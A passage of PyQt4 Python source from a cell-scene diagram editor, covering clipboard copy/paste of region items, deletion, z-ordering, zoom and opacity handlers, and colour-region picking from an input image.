)+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"COPY: lSelectedItemHasBeenCut =\", lSelectedItemHasBeenCut )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"COPY: lSelectedItemColor =\", lSelectedItemColor )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"COPY: lSelectedItemRegionOrCell = lSelectedItemRegionOrCell )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"COPY: lSelectedItemType =\", lSelectedItemType )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"COPY: lSelectedItemScaleX =\", lSelectedItemScaleX )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"COPY: lSelectedItemScaleY =\", lSelectedItemScaleY )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"COPY: lPointListX =\", lPointListX )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"COPY: lPointListY =\", lPointListY )+\" \", CDConstants.DebugTODO )\n\n # create an empty byte array:\n lItemDataByteArray = QByteArray()\n\n # open a data stream that can write to the new byte array:\n lDataStream = QtCore.QDataStream(lItemDataByteArray, QtCore.QIODevice.WriteOnly)\n\n # write into the datastream:\n lDataStream.writeQVariant(lSelectedItemPosition)\n lDataStream.writeQVariant(lSelectedItemHasBeenCut)\n lDataStream.writeQVariant(lSelectedItemColor)\n lDataStream.writeQVariant(lSelectedItemRegionOrCell)\n lDataStream.writeQVariant(lSelectedItemType)\n lDataStream.writeQVariant(lSelectedItemScaleX)\n lDataStream.writeQVariant(lSelectedItemScaleY)\n lDataStream.writeQVariant(lPointListX)\n lDataStream.writeQVariant(lPointListY)\n\n # place the byte array into a mime data container:\n lMimeData = QtCore.QMimeData()\n lMimeData.setData('application/x-pif-region-item', lItemDataByteArray)\n\n # 2010 - Mitja: this is our clipboard for cut/copy/paste operations,\n # it provides access to the single QClipboard object in the application.\n # As from Qt documentation:\n # \"Note: The QApplication object should already be constructed before accessing the clipboard.\"\n\n # place the MIME data into the application clipboard:\n lClipboard = QtGui.QApplication.clipboard()\n lClipboard.setMimeData(lMimeData)\n\n # fix for yet another PyQt bug, according to:\n # http://www.mail-archive.com/pyqt@riverbankcomputing.com/msg17328.html\n # we have to manually emit a clipboard-related event, even though we\n # just explicitly set its MIME data above.\n lEvent = QtCore.QEvent(QtCore.QEvent.Clipboard)\n QtGui.QApplication.sendEvent(lClipboard, lEvent)\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: add code for cut/copy/paste of scene items:\n # ------------------------------------------------------------\n def pasteItem(self):\n # get the application's clipboard:\n lClipboard = QtGui.QApplication.clipboard()\n if lClipboard == None:\n return\n\n # get the mime data from the application clipboard:\n lMimeData = lClipboard.mimeData()\n\n # if the MIME type is the one we specify, let's use the data:\n if lMimeData.hasFormat('application/x-pif-region-item'):\n # data() returns the a byte array containing the data stored in the clipboard,\n # in the format described by the specified MIME type:\n lItemDataByteArray = lMimeData.data('application/x-pif-region-item')\n # open a data stream that can read from that byte array:\n lDataStream = QtCore.QDataStream(lItemDataByteArray, QtCore.QIODevice.ReadOnly)\n\n # according to Qt documentation:\n # \"because QVariant is part of the QtCore library, it cannot provide conversion\n # functions to data types defined in QtGui, such as QColor, QImage, and QPixmap.\n # In other words, there is no toColor() function. Instead, you can use the\n # QVariant::value() or the qVariantValue() template function\"\n # But the value() template trick doesn't work with PyQt, and unfortunately\n # there is no PyQt documentation to explain why, nor show any workarounds.\n\n # read from the datastream:\n lSelectedItemPosition = lDataStream.readQVariant().toPointF()\n lSelectedItemHasBeenCut = lDataStream.readQVariant().toBool()\n lSelectedItemColor = QtGui.QColor(lDataStream.readQVariant()) \n # a bit counterintuitively, the toInt() and toFloat() functions DON'T return\n # ints or floats... they return couples of values. So we grab the first ones:\n lSelectedItemRegionOrCell = lDataStream.readQVariant().toInt()[0]\n lSelectedItemType = lDataStream.readQVariant().toInt()[0]\n lSelectedItemScaleX = lDataStream.readQVariant().toFloat()[0]\n lSelectedItemScaleY = lDataStream.readQVariant().toFloat()[0]\n \n lListOfPointsX = lDataStream.readQVariant().toList()\n lListOfPointsY = lDataStream.readQVariant().toList()\n CDConstants.printOut(\"PASTE: lListOfPointsX =\", lListOfPointsX , CDConstants.DebugTODO )\n CDConstants.printOut(\"PASTE: lListOfPointsY =\", lListOfPointsY , CDConstants.DebugTODO )\n lLengthX = len(lListOfPointsX)\n lLengthY = len(lListOfPointsY)\n if lLengthX == lLengthY:\n pass\n else:\n CDConstants.printOut(\"PASTE: received INCONSISTENT paste data! Can't paste.\", CDConstants.DebugTODO )\n return\n\n\n lSelectedItemPolygon = QtGui.QPolygonF()\n # CDConstants.printOut( \" \"+str( \"PASTE: lSelectedItemPolygon =\", lSelectedItemPolygon )+\" \", CDConstants.DebugTODO )\n\n\n for i in xrange(lLengthX):\n # CDConstants.printOut( \" \"+str( \"PASTE: lListOfPointsX[i].toFloat() = \", lListOfPointsX[i].toFloat() )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"PASTE: lListOfPointsY[i].toFloat() = \", lListOfPointsX[i].toFloat() )+\" \", CDConstants.DebugTODO )\n lPointF = QtCore.QPointF(lListOfPointsX[i].toFloat()[0], lListOfPointsY[i].toFloat()[0])\n # CDConstants.printOut( \" \"+str( \"PASTE: lPointF =\", lPointF )+\" \", CDConstants.DebugTODO )\n lSelectedItemPolygon.append(lPointF)\n\n\n CDConstants.printOut(\"PASTE: lSelectedItemPosition =\", lSelectedItemPosition , CDConstants.DebugTODO )\n CDConstants.printOut(\"PASTE: lSelectedItemHasBeenCut =\", lSelectedItemHasBeenCut , CDConstants.DebugTODO )\n CDConstants.printOut(\"PASTE: lSelectedItemColor =\", lSelectedItemColor , CDConstants.DebugTODO )\n CDConstants.printOut(\"PASTE: lSelectedItemRegionOrCell =\", lSelectedItemRegionOrCell , CDConstants.DebugTODO )\n CDConstants.printOut(\"PASTE: lSelectedItemType =\", lSelectedItemType , CDConstants.DebugTODO )\n CDConstants.printOut(\"PASTE: lSelectedItemScaleX =\", lSelectedItemScaleX , CDConstants.DebugTODO )\n CDConstants.printOut(\"PASTE: lSelectedItemScaleY =\", lSelectedItemScaleY , CDConstants.DebugTODO )\n CDConstants.printOut(\"PASTE: lSelectedItemPolygon =\", lSelectedItemPolygon , CDConstants.DebugTODO )\n\n # convert the polygon we've constructed from pasted QPointF values\n # into a QPainterPath which can be digested by the DiagramItem constructor:\n lPath = QtGui.QPainterPath()\n lPath.addPolygon(lSelectedItemPolygon)\n lTheNewItem = DiagramItem(lPath, self.scene.myItemMenu)\n # set the new item's color i.e. brush value:\n lTheNewItem.setBrush(lSelectedItemColor)\n # 2011 - Mitja: the new item is a region of cells or a single cell:\n lTheNewItem.setRegionOrCell(lSelectedItemRegionOrCell)\n\n # finally, place the newly built item, i.e. \"paste\" it into the Cell Scene:\n self.scene.addItem(lTheNewItem)\n\n # to provide the default behavior of having the new item selected,\n # first unselect all selected items in the scene:\n for anItem in self.scene.selectedItems():\n anItem.setSelected(False)\n # then select the newly created item:\n lTheNewItem.setSelected(True)\n\n # emit our own signal to the handler which does other GUI adjustments\n # whenever a new signal is inserted:\n self.scene.signalThatItemInserted.emit(lTheNewItem)\n\n # position the new item in the scene:\n if lSelectedItemHasBeenCut == False:\n # shift the copied item's position slightly if it wasn't \"cut\",\n # so that when it's pasted back it is distinguishable from the original:\n lSelectedItemPosition.setX ( lSelectedItemPosition.x() + 13.0 )\n lSelectedItemPosition.setY ( lSelectedItemPosition.y() + 13.0 )\n lTheNewItem.setPos(lSelectedItemPosition)\n \n # set the same size transformation to the pasted item as it had from the copied/cut one:\n lTheNewItem.myScaleX = lSelectedItemScaleX\n lTheNewItem.myScaleY = lSelectedItemScaleY\n # using QTransform, we first create a transformation, then we apply it to the item:\n lTransform = QtGui.QTransform()\n lTransform.scale( lTheNewItem.myScaleX, lTheNewItem.myScaleY )\n lTheNewItem.setTransform( lTransform )\n \n # 2011 - Mitja: after setting the pasted item's color (AKA brush)\n # also update the scene's regionUseDict since it contains the list of all\n # region colors in use by our scene:\n self.scene.addToRegionColorsInUse(lSelectedItemColor)\n\n \n\n\n # ------------------------------------------------------------\n def deleteItem(self):\n for item in self.scene.selectedItems():\n if isinstance(item, DiagramItem):\n item.removeArrows()\n\n # 2011 - Mitja: after obtaining the deleted item's color (AKA brush)\n # also update the scene's regionUseDict since it contains the list of all\n # region colors in use by our scene:\n lSelectedItemColor = item.brush()\n self.scene.subtractFromRegionColorsInUse(lSelectedItemColor)\n\n self.scene.removeItem(item)\n \n # 2010 - Mitja - clear any outlines which may be in use for resizing:\n self.scene.stopOutlineResizing()\n \n # 2011 - Mitja - clear any x/y/w/h information about current item:\n lBoundingRect = QtCore.QRectF(0.0, 0.0, 0.0, 0.0)\n self.scene.signalThatItemResized.emit(lBoundingRect)\n \n\n\n # ------------------------------------------------------------------\n # 2010 Mitja - slot method handling \"signalLayersSelectionModeHasChanged\"\n # events (AKA signals) arriving from theControlsForLayerSelection:\n # ------------------------------------------------------------------\n def handleLayersSelectionModeHasChanged(self, pNewMode):\n\n CDConstants.printOut( \"___ starting handleLayersSelectionModeHasChanged( pNewMode == \"+str(pNewMode)+\" ) ....\", CDConstants.DebugTODO )\n # we used to query which button is checked explicitly, but we now\n # receive that information as parameter directly from the signal:\n # lCheckedId = self.theControlsForLayerSelection.getCheckedButtonId()\n self.scene.setMode(pNewMode)\n\n # 2011 - Mitja: enable/disable SceneModeImageLayer-specific buttons:\n if self.scene.getMode() == CDConstants.SceneModeImageLayer:\n self.theControlsForInputImagePicking.setEnabled(True)\n else:\n self.theControlsForInputImagePicking.setEnabled(False)\n\n # 2011 - Mitja: enable/disable SceneModeImageSequence-specific controls:\n if self.scene.getMode() == CDConstants.SceneModeImageSequence:\n self.theControlsForImageSequence.setEnabled(True)\n # signal upstream about the updated usage of this region color:\n self.parentWindow.theTableOfTypes.updateTableOfTypesForImageSequenceOn()\n CDConstants.printOut( \" in handleLayersSelectionModeHasChanged() -- self.parentWindow.theTableOfTypes.updateTableOfTypesForImageSequenceOn() called.\", CDConstants.DebugTODO )\n else:\n self.theControlsForImageSequence.setEnabled(False)\n # signal upstream about the updated usage of this region color:\n self.parentWindow.theTableOfTypes.updateTableOfTypesForImageSequenceOff()\n CDConstants.printOut( \" in handleLayersSelectionModeHasChanged() -- self.parentWindow.theTableOfTypes.updateTableOfTypesForImageSequenceOff() called.\", CDConstants.DebugTODO )\n\n CDConstants.printOut( \"___ ending handleLayersSelectionModeHasChanged( pNewMode == \"+str(pNewMode)+\" ) ....done.\", CDConstants.DebugTODO )\n\n # ------------------------------------------------------------\n def bringToFront(self):\n if not self.scene.selectedItems():\n return\n\n selectedItem = self.scene.selectedItems()[0]\n overlapItems = selectedItem.collidingItems()\n\n zValue = 0\n for item in overlapItems:\n if (item.zValue() >= zValue and isinstance(item, DiagramItem)):\n zValue = item.zValue() + 0.1\n selectedItem.setZValue(zValue)\n\n # ------------------------------------------------------------\n def sendToBack(self):\n if not self.scene.selectedItems():\n return\n\n selectedItem = self.scene.selectedItems()[0]\n overlapItems = selectedItem.collidingItems()\n\n zValue = 0\n for item in overlapItems:\n if (item.zValue() <= zValue and isinstance(item, DiagramItem)):\n zValue = item.zValue() - 0.1\n selectedItem.setZValue(zValue)\n\n # ------------------------------------------------------------\n def handlerForItemInserted(self, item):\n self.theControlsForLayerSelection.setCheckedButton( \\\n CDConstants.SceneModeMoveItem, True )\n lCheckedId = self.theControlsForLayerSelection.getCheckedButtonId()\n self.scene.setMode(lCheckedId)\n\n # 2011 - Mitja: disable SceneModeImageLayer-specific buttons:\n self.theControlsForInputImagePicking.setEnabled(False)\n\n # 2011 - Mitja: disable SceneModeImageSequence-specific buttons:\n self.theControlsForImageSequence.setEnabled(False)\n\n # 2010 - Mitja: add code for handling insertion of pixmap items:\n try:\n self.theButtonGroupForRegionShapes.button(item.diagramType).setChecked(False)\n except:\n CDConstants.printOut(\"EXCEPTION EXCEPTION EXCEPTION item item item item =\", item , CDConstants.DebugTODO )\n pass\n\n\n\n # ------------------------------------------------------------\n def handlerForMouseMoved(self, pDict):\n lDict = dict(pDict)\n self.theControlsForInputImagePicking.setFreehandXLabel(lDict[0])\n self.theControlsForInputImagePicking.setFreehandYLabel(lDict[1])\n self.theControlsForInputImagePicking.setFreehandColorLabel( \\\n QtGui.QColor( lDict[2], lDict[3], lDict[4] ) )\n\n\n\n # ------------------------------------------------------------\n def handlerForItemResized(self, pRect):\n lRect = QtCore.QRectF(pRect)\n# CDConstants.printOut( \" \"+str( lRect )+\" \", CDConstants.DebugTODO )\n self.windowPIFControlPanel.setResizingItemXLabel(str(int(lRect.x())))\n self.windowPIFControlPanel.setResizingItemYLabel(str(int(lRect.y())))\n self.windowPIFControlPanel.setResizingItemWidthLabel(str(int(lRect.width())))\n self.windowPIFControlPanel.setResizingItemHeightLabel(str(int(lRect.height())))\n# self.scene.setMode(self.theControlsForLayerSelection.getCheckedButtonId())\n# self.theButtonGroupForRegionShapes.button(self.InsertTextButton).setChecked(False)\n# self.theControlsForInputImagePicking.setEnabled(False)\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: moving to a MVC design,\n # this connect signal handler should go to the Controller object!\n # ------------------------------------------------------------\n def handlerForSceneResized(self, pDict):\n lDict = dict(pDict)\n print\n CDConstants.printOut(\" TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO \", CDConstants.DebugTODO )\n CDConstants.printOut(str( lDict ) , CDConstants.DebugTODO )\n CDConstants.printOut(\" TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO \", CDConstants.DebugTODO )\n print\n self.windowPIFControlPanel.setSceneWidthLabel(lDict[0])\n self.windowPIFControlPanel.setSceneHeightLabel(lDict[1])\n self.windowPIFControlPanel.setSceneDepthLabel(lDict[2])\n self.windowPIFControlPanel.setSceneUnitsLabel(lDict[3])\n\n\n # ------------------------------------------------------------\n def handlerForTextInserted(self, item):\n self.theButtonGroupForRegionShapes.button(self.InsertTextButton).setChecked(False)\n lCheckedId = self.theControlsForLayerSelection.getCheckedButtonId()\n self.scene.setMode(lCheckedId)\n # 2011 - Mitja: disable SceneModeImageLayer-specific buttons:\n self.theControlsForInputImagePicking.setEnabled(False)\n # 2011 - Mitja: disable SceneModeImageSequence-specific buttons:\n self.theControlsForInputImagePicking.setEnabled(False)\n\n # ------------------------------------------------------------\n def currentFontChanged(self, font):\n self.handleFontChange()\n\n # ------------------------------------------------------------\n def fontSizeChanged(self, font):\n self.handleFontChange()\n\n\n # ------------------------------------------------------------------\n # 2010 Mitja - this is a slot method to handle\n # \"current index changed\" events (AKA signals) arriving from\n # the object theSceneScaleZoomControl\n # ------------------------------------------------------------------\n def handleSceneScaleZoomChanged(self, pScale):\n lNewScale = pScale.left(pScale.indexOf(\"%\")).toDouble()[0] / 100.0\n oldMatrix = self.view.matrix()\n self.view.resetMatrix()\n self.view.translate(oldMatrix.dx(), oldMatrix.dy())\n # take care of the RHS <-> LHS mismatch at its visible end,\n # by flipping the y coordinate in the QGraphicsView's affine transformations:\n self.view.scale(lNewScale, -lNewScale)\n # 2011 Mitja - add scale/zoom parameters stored into our DiagramScene object:\n self.scene.myViewScaleZoomX = lNewScale\n self.scene.myViewScaleZoomY = lNewScale\n CDConstants.printOut( \"___ - DEBUG ----- CDDiagramSceneMainWidget.handleSceneScaleZoomChanged() - self.scene.myViewScaleZoomX = \" + \\\n str(self.scene.myViewScaleZoomX) + \" self.scene.myViewScaleZoomY = \" + str(self.scene.myViewScaleZoomY) , CDConstants.DebugVerbose )\n\n\n\n # ------------------------------------------------------------------\n # 2010 Mitja - this is a slot method to handle\n # \"current index changed\" events (AKA signals) arriving from\n # the object theControlsForInputImagePicking\n # ------------------------------------------------------------------\n def handleImageScaleZoomChanged(self, pScale):\n lNewScale = pScale.left(pScale.indexOf(\"%\")).toDouble()[0] / 100.0\n\n if isinstance(self.scene.theImageLayer, CDImageLayer) == True:\n self.scene.theImageLayer.setScaleZoom( lNewScale )\n\n self.scene.update()\n\n CDConstants.printOut(\" self.theCDImageLayer.scaleFactor = \"+str(self.theCDImageLayer.scaleFactor) , CDConstants.DebugTODO )\n\n\n\n # ------------------------------------------------------------\n def textColorChanged(self):\n self.textAction = self.sender()\n self.fontColorToolButton.setIcon(self.createColorToolButtonIcon(\n ':/icons/textpointer.png',\n QtGui.QColor(self.textAction.data())))\n self.textButtonTriggered()\n\n\n # ------------------------------------------------------------\n def lineColorChanged(self):\n self.lineAction = self.sender()\n self.lineColorToolButton.setIcon(self.createColorToolButtonIcon(\n ':/icons/linecolor.png',\n QtGui.QColor(self.lineAction.data())))\n self.lineButtonTriggered()\n\n # ------------------------------------------------------------\n def textButtonTriggered(self):\n self.scene.setTextColor(QtGui.QColor(self.textAction.data()))\n\n # ------------------------------------------------------------\n def lineButtonTriggered(self):\n self.scene.setLineColor(QtGui.QColor(self.lineAction.data()))\n\n # ------------------------------------------------------------\n def handleFontChange(self):\n font = self.fontCombo.currentFont()\n font.setPointSize(self.fontSizeCombo.currentText().toInt()[0])\n if self.boldAction.isChecked():\n font.setWeight(QtGui.QFont.Bold)\n else:\n font.setWeight(QtGui.QFont.Normal)\n font.setItalic(self.italicAction.isChecked())\n font.setUnderline(self.underlineAction.isChecked())\n\n self.scene.setFont(font)\n\n # ------------------------------------------------------------\n def handlerForItemSelected(self, item):\n font = item.font()\n color = item.defaultTextColor()\n self.fontCombo.setCurrentFont(font)\n self.fontSizeCombo.setEditText(str(font.pointSize()))\n self.boldAction.setChecked(font.weight() == QtGui.QFont.Bold)\n self.italicAction.setChecked(font.italic())\n self.underlineAction.setChecked(font.underline())\n\n\n\n\n\n # ------------------------------------------------------------------\n # 2011 Mitja - this is a slot method to handle \"current type color\" events\n # (AKA signals) arriving from the object theControlsForTypes\n # ------------------------------------------------------------\n def handleTypesColorEvent(self, pColor):\n # CDConstants.printOut( \" \"+str( \"handleTypesColorEvent received pColor =\", pColor )+\" \", CDConstants.DebugTODO )\n \n # this signal has to be handled differently according to the current mode:\n\n # 2011 - Mitja - use this overlay routine to draw selected content from an image sequence\n # as foreground to the graphics scene, in \"SceneModeImageSequence\"\n if (self.scene.mySceneMode == CDConstants.SceneModeImageSequence):\n self.scene.setSequenceColor(QtGui.QColor(pColor))\n else:\n self.scene.setItemColor(QtGui.QColor(pColor))\n\n\n\n # ------------------------------------------------------------------\n # 2011 Mitja - this is a slot method to handle \"button change\" events\n # (AKA signals) arriving from the object theToggleforRegionOrCellDrawing\n # ------------------------------------------------------------------\n def handleToggleRegionOrCellDrawingChanged(self, pRegionOrCell):\n # this is a SLOT function for the signal \"signalSetRegionOrCell()\"\n # from theToggleforRegionOrCellDrawing\n #\n # here we retrieve the updated value from radio buttons and update\n # the global keeping track of the drawing mode:\n # 0 = Cell Draw = CDConstants.ItsaCellConst\n # 1 = Region Draw = CDConstants.ItsaRegionConst\n\n self.scene.setItemRegionOrCell(pRegionOrCell)\n\n CDConstants.printOut( \" self.handleToggleRegionOrCellDrawingChanged: \"+str(pRegionOrCell) , CDConstants.DebugExcessive )\n\n\n\n\n\n # ------------------------------------------------------------------\n # 2010 Mitja - this is a slot method to handle \"button change\" events\n # (AKA signals) arriving from the object theControlsForInputImagePicking\n # ------------------------------------------------------------------\n def handleInputImagePickingModeChanged(self):\n # SLOT function for the signal \"inputImagePickingModeChangedSignal()\"\n # from theControlsForInputImagePicking\n #\n # here we retrieve the updated values from radio buttons and update\n # the global keeping track of what's been changed:\n # 0 = Color Pick = CDConstants.ImageModePickColor\n # 1 = Freehand Draw = CDConstants.ImageModeDrawFreehand\n # 2 = Polygon Draw = CDConstants.ImageModeDrawPolygon\n # 3 = Extract Cells = CDConstants.ImageModeExtractCells\n self.theCDImageLayer.inputImagePickingMode = \\\n self.theControlsForInputImagePicking.theInputImagePickingMode\n\n # if inputImagePickingMode is 3, i.e. Polygon Draw,\n # then we need to track *passive* mouse motion;\n # same for mode 0, i.e. Color Pick, and mode 3, i.e. Extract Cells\n #\n # otherwise we only track *active* mouse motion (which is the default for QWidget),\n # i.e. when at least one mouse button is pressed while the mouse is moved:\n if (self.theCDImageLayer.inputImagePickingMode == CDConstants.ImageModeDrawPolygon):\n self.theCDImageLayer.setMouseTracking(True)\n elif (self.theCDImageLayer.inputImagePickingMode == CDConstants.ImageModePickColor):\n self.theCDImageLayer.setMouseTracking(True)\n elif (self.theCDImageLayer.inputImagePickingMode == CDConstants.ImageModeExtractCells):\n self.theCDImageLayer.setMouseTracking(True)\n else:\n self.theCDImageLayer.setMouseTracking(False)\n\n self.scene.update()\n\n CDConstants.printOut(\" self.theCDImageLayer.inputImagePickingMode = \"+str(self.theCDImageLayer.inputImagePickingMode) , CDConstants.DebugTODO )\n\n\n\n\n\n\n\n # ------------------------------------------------------------------\n # 2011 Mitja - this is a slot method to handle \"slider change\" events\n # (AKA signals) arriving from the object theControlsForInputImagePicking\n # ------------------------------------------------------------------\n def handleImageOpacityChanged(self):\n # SLOT function for the signal \"inputImageOpacityChangedSignal()\"\n # from theControlsForInputImagePicking\n #\n # here we retrieve the updated value from the opacity slider and update\n # from the class global keeping track of the required opacity:\n # 0 = minimum = the image is completely transparent (invisible)\n # 100 = minimum = the image is completely opaque\n\n if isinstance(self.scene.theImageLayer, CDImageLayer) == True:\n self.scene.theImageLayer.setImageOpacity( \\\n self.theControlsForInputImagePicking.theImageOpacity )\n\n self.scene.update()\n\n CDConstants.printOut(\" self.theCDImageLayer.imageOpacity = \"+str(self.theCDImageLayer.imageOpacity) , CDConstants.DebugTODO )\n\n\n\n\n # ------------------------------------------------------------------\n # 2011 Mitja - this is a slot method to handle \"slider change\" events\n # (AKA signals) arriving from the object theControlsForInputImagePicking\n # ------------------------------------------------------------------\n def handleFuzzyPickThresholdChanged(self):\n # SLOT function for the signal \"fuzzyPickTresholdChangedSignal()\"\n # from theControlsForInputImagePicking\n #\n # here we retrieve the updated value from the opacity slider and update\n # from the class global keeping track of the fuzzy pick treshold:\n # 0 = minimum = pick only the seed color\n # 100 = minimum = pick everything in the image\n\n if isinstance(self.scene.theImageLayer, CDImageLayer) == True:\n self.scene.theImageLayer.setFuzzyPickTreshold( \\\n self.theControlsForInputImagePicking.theFuzzyPickTreshold )\n\n self.scene.update()\n\n CDConstants.printOut(\" self.theCDImageLayer.fuzzyPickTreshold =\"+str(self.theCDImageLayer.fuzzyPickTreshold) , CDConstants.DebugTODO )\n\n\n\n # ---------------------------------------------------------\n # 2011 - Mitja: handleMousePressedInImageLayerSignal() is called every time\n # the theCDImageLayer object emits a \"mousePressedInImageLayerSignal()\" signal,\n # (defined in the CDImageLayer class's mousePressEvent() function),\n # ---------------------------------------------------------\n def handleMousePressedInImageLayerSignal(self):\n\n # 2011 - Mitja: only do something about mouse clicks within the theCDImageLayer\n # if the theCDImageLayer contains an image loaded from a file.\n # Otherwise do nothing:\n if self.theCDImageLayer.imageLoadedFromFile == False:\n CDConstants.printOut(\"2011 DEBUG: ---- ---- CDDiagramSceneMainWidget ---- ---- handleMousePressedInImageLayerSignal() has no input image. Returning.\", CDConstants.DebugTODO )\n return\n\n # 2011 - Mitja: obtain the x,y coordinates where the mouse was clicked\n # within the theCDImageLayer:\n x = self.theCDImageLayer.myMouseX\n y = self.theCDImageLayer.myMouseY\n # 2011 - Mitja: obtain the color of the pixel at coordinates i,j as\n # QRgb type in the format #AARRGGBB (equivalent to an unsigned int) :\n lRGBAColorAtClickedPixel = self.theCDImageLayer.processedImage.pixel(x,y)\n\n # 2011 - Mitja: if asked to ignore white or black, ignore clicks on white or black:\n if (self.parentWindow.ignoreWhiteRegionsForPIF == True) and (lRGBAColorAtClickedPixel == QtGui.QColor(QtCore.Qt.white).rgba()) :\n CDConstants.printOut(\"2011 DEBUG: ---- ---- CDDiagramSceneMainWidget ---- ---- handleMousePressedInImageLayerSignal() clicked on white. Returning.\", CDConstants.DebugTODO )\n return # do nothing\n if (self.parentWindow.ignoreBlackRegionsForPIF == True) and (lRGBAColorAtClickedPixel == QtGui.QColor(QtCore.Qt.black).rgba()) :\n CDConstants.printOut(\"2011 DEBUG: ---- ---- CDDiagramSceneMainWidget ---- ---- handleMousePressedInImageLayerSignal() clicked on black. Returning.\", CDConstants.DebugTODO )\n return # do nothing\n\n # 2011 - Mitja: now find if the picked color is actually in the list of scene colors,\n # or if we need to compute the closest one:\n if lRGBAColorAtClickedPixel in self.parentWindow.colorDict:\n lRegionName = self.parentWindow.colorDict[lRGBAColorAtClickedPixel]\n lRGBAClosestColor = lRGBAColorAtClickedPixel\n else:\n lColorDistance = 9999.9\n lRGBAClosestColor = 0\n for lRegionColor in self.parentWindow.colorIds:\n r1 = QtGui.QColor(lRGBAColorAtClickedPixel).redF()\n g1 = QtGui.QColor(lRGBAColorAtClickedPixel).greenF()\n b1 = QtGui.QColor(lRGBAColorAtClickedPixel).blueF()\n r2 = QtGui.QColor(lRegionColor).redF()\n g2 = QtGui.QColor(lRegionColor).greenF()\n b2 = QtGui.QColor(lRegionColor).blueF()\n d = ((r2-r1)*0.30) * ((r2-r1)*0.30) \\\n + ((g2-g1)*0.59) * ((g2-g1)*0.59) \\\n + ((b2-b1)*0.11) * ((b2-b1)*0.11)\n CDConstants.printOut(\"r1, g1, b1, r2, g2, b2, d, lColorDistance, lRGBAClosestColor =\"+str(r1)+\", \"+str(g1)+\", \"+str(b1)+\", \"+str(r2)+\", \"+str(g2)+\", \"+str(b2)+\", \"+str(d)+\", \"+str(lColorDistance)+\", \"+str(lRGBAClosestColor) , CDConstants.DebugTODO )\n if (lColorDistance > d) :\n lRGBAClosestColor = lRegionColor\n lColorDistance = d\n\n CDConstants.printOut(\"Inserting\", CDConstants.DebugTODO )\n CDConstants.printOut(str( lRGBAColorAtClickedPixel) , CDConstants.DebugTODO )\n CDConstants.printOut(str( lRGBAClosestColor) , CDConstants.DebugTODO )\n CDConstants.printOut(str( self.parentWindow.comboDict[lRGBAClosestColor] ) , CDConstants.DebugTODO )\n\n lClosestColor = QtGui.QColor(lRGBAClosestColor)\n lClickedPixelColor = QtGui.QColor(lRGBAColorAtClickedPixel)\n\n \n # 2011 - Mitja: this is how we'd get from key to region name:\n # key = (int)(self.parentWindow.ui.colorId2Text.text())\n # name = self.parentWindow.colorDict[key]\n \n # 2011 - Mitja: add functionality for picking a color region: \n if (self.parentWindow.pickColorRegion == True) :\n\n # 1. get a *pixmap copy* of the QImage from theCDImageLayer:\n lOriginalPixmap = QtGui.QPixmap( QtGui.QPixmap.fromImage(self.theCDImageLayer.processedImage) )\n # 2. create a \"mask\" QBitmap object from lOriginalPixmap's pixels NOT in the clicked color:\n lTheMaskBitmap = lOriginalPixmap.createMaskFromColor(lClickedPixelColor, QtCore.Qt.MaskOutColor)\n # 3. apply lTheMaskBitmap to lOriginalPixmap, so that it eliminates all other color pixels from it:\n # ------> BUT the setMask() function applied to lOriginalPixmap will ALSO mask the theCDImageLayer... WHY???\n # lOriginalPixmap.setMask( lTheMaskBitmap )\n\n # 3. create an empty pixmap where to store the composed image:\n lResultPixmap = QtGui.QPixmap(self.theCDImageLayer.width, self.theCDImageLayer.height)\n # 4. create a QPainter to perform the overlay operation:\n lPainter = QtGui.QPainter(lResultPixmap)\n # 5. do the overlay:\n lPainter.setCompositionMode(lPainter.CompositionMode_Source)\n lPainter.fillRect(lResultPixmap.rect(), QtCore.Qt.transparent)\n lPainter.setCompositionMode(lPainter.CompositionMode_SourceOver)\n lPainter.drawPixmap(QtCore.QPoint(0,0), lOriginalPixmap)\n lPainter.end() \n\n # don't copy the input image back to theCDImageLayer:\n # self.theCDImageLayer.setPixmap(lResultPixmap)\n # self.scene.update()\n \n # now obtain a QRegion from the pixmap:\n theRegionFromBitmap = QtGui.QRegion(lTheMaskBitmap)\n # create a QGraphicsItem from a QPainterPath created from the pixmap:\n thePainterPath = QtGui.QPainterPath()\n thePainterPath.addRegion(theRegionFromBitmap)\n theGraphicsPathItem = QtGui.QGraphicsPathItem(thePainterPath)\n\n # create a QGraphicsItem from the pixmap:\n theGraphicsPixmapItem = QtGui.QGraphicsPixmapItem(lOriginalPixmap)\n\n if (self.parentWindow.pickColorAsPath == False) :\n theGraphicsItem = theGraphicsPixmapItem\n # this always remains True since we only pick colors as paths (polygons) now:\n # self.parentWindow.pickColorAsPath = True\n else :\n theGraphicsItem = theGraphicsPathItem\n # this always remains True since we only pick colors as paths (polygons) now:\n # self.parentWindow.pickColorAsPath = False\n\n # set the graphics item's color to be the one we computed above\n # (i.e. either it's already the same as in our list of scene colors,\n # or we computed the closest one) :\n theGraphicsItem.setBrush(lClosestColor)\n\n # pass the QGraphicsItem to the external QGraphicsScene window:\n self.scene.mousePressEvent( \\\n QtGui.QMouseEvent( QtCore.QEvent.GraphicsSceneMousePress, \\\n QtCore.QPoint(x,y), \\\n QtCore.Qt.NoButton, QtCore.Qt.NoButton, QtCore.Qt.NoModifier), \\\n theGraphicsItem )\n\n\n # 2011 - Mitja: restore the original QImage loaded from a file\n # back into the processed QImage, undoing all color processing.\n self.theCDImageLayer.setToProcessedImage()\n\n\n\n\n\n\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: moving to a MVC design, TODO:\n # this connect signal handler should go to the Controller object!\n #\n # handleImageSequenceResized() responds to signalThatImageSequenceResized changes\n # ------------------------------------------------------------\n def handleImageSequenceResized(self, pDict):\n lDict = dict(pDict)\n CDConstants.printOut(\"CDDiagramSceneMainWidget - handleImageSequenceResized() - \" + \\\n str( lDict ), CDConstants.DebugTODO )\n 